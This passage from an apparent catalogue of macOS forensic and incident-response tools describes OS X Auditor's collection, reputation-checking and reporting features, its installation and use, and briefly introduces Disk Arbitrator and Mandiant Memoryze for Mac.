the users’ Chrome history and archives history, cookies, login data, top sites, web data, HTML5 databases and local storage

the users’ social and email accounts

the WiFi access points the audited system has been connected to (and tries to geolocate them)

It also looks for suspicious keywords in the .plist themselves.
It can verify the reputation of each file on:

Team Cymru’s MHR

VirusTotal

your own local database

It can aggregate all logs from the following directories into a zipball:

/var/log (-> /private/var/log)

/Library/logs

the user’s ~/Library/logs

Finally, the results can be:

rendered as a simple txt log file (so you can cat-pipe-grep in them… or just grep)

rendered as a HTML log file

sent to a Syslog server

Author
Jean-Philippe Teissier – @Jipe_ & al.

Support
OS X Auditor started as a week-end project and is now barely maintained. It has been forked by the great guys @ Yelp who created osxcollector.
If you are looking for a production / corporate solution I do recommend you to move to osxcollector (https://github.com/Yelp/osxcollector)

How to install
Just copy all files from GitHub.

Dependencies
If you plan to run OS X Auditor on a Mac, you will get a full plist parsing support with the OS X Foundation through pyobjc:

pip install pyobjc

If you can’t install pyobjc or if you plan to run OS X Auditor on another OS than Mac OS X, you may experience some troubles with the plist parsing:

pip install biplist
pip install plist

These dependencies will be removed when a working native plist module will be available in python

How to run

OS X Auditor runs well with python >= 2.7.2 (2.7.9 is OK). It does not run with a different version of python yet (due to the plist nightmare)

OS X Auditor is maintained to work on the lastest OS X version. It will do its best on older OS X versions.

You must run it as root (or via sudo) if you want to use is on a running system, otherwise it won’t be able to access some system and other users’ files

If you’re using API keys from environment variables (see below), you need to use the sudo -E to use the users environment variables

Type osxauditor.py -h to get all the available options, then run it with the selected options
eg. [sudo -E] python osxauditor.py -a -m -l localhashes.db -H log.html

Disk Arbitrator
Disk Arbitrator is Mac OS X forensic utility designed to help the user ensure correct forensic procedures are followed during imaging of a disk device. Disk Arbitrator is essentially a user interface to the Disk Arbitration framework, which enables a program to participate in the management of block storage devices, including the automatic mounting of file systems. When enabled, Disk Arbitrator will block the mounting of file systems to avoid mounting as read-write and violating the integrity of the evidence.https://github.com/aburgh/Disk-Arbitrator

Mandiant Memoryze(tm) for the Mac
Memoryze for the Mac is free memory forensic software that helps incident responders find evil in memory… on Macs. Memoryze for the Mac can acquire and/or analyze memory images. Analysis can be performed on offline memory images or on live systems.http://www.mandiant.com/resources/download/mac-memoryze